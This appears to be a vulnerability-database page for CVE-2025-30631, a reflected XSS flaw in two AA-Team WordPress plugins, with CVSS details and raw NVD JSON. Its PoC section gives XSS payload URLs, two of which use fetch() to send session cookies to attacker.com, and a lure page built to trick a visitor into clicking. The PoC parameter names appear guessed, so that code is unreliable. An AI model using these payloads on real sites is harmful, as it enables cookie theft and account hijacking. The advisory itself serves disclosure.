Security Vulnerability Report
中文
CVE-2025-30631 CVSS 7.1 HIGH

CVE-2025-30631

Published: 2026-01-06 21:15:42
Last Modified: 2026-04-28 19:30:21
Source: [email protected]

Description

Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in AA-Team Woocommerce Sales Funnel Builder, AA-Team Amazon Affiliates Addon for WPBakery Page Builder (formerly Visual Composer) allows Reflected XSS.This issue affects Woocommerce Sales Funnel Builder: from n/a through 1.1; Amazon Affiliates Addon for WPBakery Page Builder (formerly Visual Composer): from n/a through 1.2.

CVSS Details

CVSS Score
7.1
Severity
HIGH
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L

Configurations (Affected Products)

No configuration data available.

Woocommerce Sales Funnel Builder < 1.1
Amazon Affiliates Addon for WPBakery Page Builder < 1.2

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
<!-- CVE-2025-30631 Reflected XSS PoC --> <!-- 恶意URL构造示例 --> <!-- Woocommerce Sales Funnel Builder XSS --> https://target-site.com/?s=%3Cscript%3Ealert%28document.cookie%29%3C/script%3E https://target-site.com/?woof_search=%3Cimg%20src=x%20onerror=alert%28%22XSS%22%29%3E <!-- Amazon Affiliates Addon XSS --> https://target-site.com/?amazon_search=%3Cscript%3Efetch%28%27https://attacker.com/steal?c=%27%2Bdocument.cookie%29%3C/script%3E https://target-site.com/?vc_azon=%3Csvg/onload=alert%28document.domain%29%3E <!-- 完整攻击HTML页面示例 --> <!DOCTYPE html> <html> <head><title>XSS Attack</title></head> <body> <h1>Click to view your account</h1> <a href='http://target-site.com/?s=%3Cscript%3Efetch%28%27https://attacker.com/steal?c=%27%2BencodeURIComponent%28document.cookie%29%29%3C/script%3E'> Click Here </a> </body> </html> <!-- 自动化检测脚本 --> <script> // 检测漏洞是否存在 const testPayload = '<img src=x onerror=console.log("XSS")>'; const testUrl = window.location.origin + '/?s=' + encodeURIComponent(testPayload); // 实际攻击时使用 fetch 发送cookie到攻击者服务器 </script>

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2025-30631", "sourceIdentifier": "[email protected]", "published": "2026-01-06T21:15:42.407", "lastModified": "2026-04-28T19:30:21.270", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting') vulnerability in AA-Team Woocommerce Sales Funnel Builder, AA-Team Amazon Affiliates Addon for WPBakery Page Builder (formerly Visual Composer) allows Reflected XSS.This issue affects Woocommerce Sales Funnel Builder: from n/a through 1.1; Amazon Affiliates Addon for WPBakery Page Builder (formerly Visual Composer): from n/a through 1.2."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L", "baseScore": 7.1, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 2.8, "impactScore": 3.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-79"}]}], "references": [{"url": "https://patchstack.com/database/wordpress/plugin/azon-addon-js-composer/vulnerability/wordpress-amazon-affiliates-addon-for-wpbakery-page-builder-formerly-visual-composer-1-2-cross-site-scripting-xss-vulnerability?_s_id=cve", "source": "[email protected]"}, {"url": "https://patchstack.com/database/wordpress/plugin/woosales/vulnerability/wordpress-woocommerce-sales-funnel-builder-plugin-1-1-reflected-cross-site-scripting-xss-vulnerability?_s_id=cve", "source": "[email protected]"}]}}
Disclaimer

This information is for security research and authorized penetration testing only. Unauthorized testing of other systems is illegal.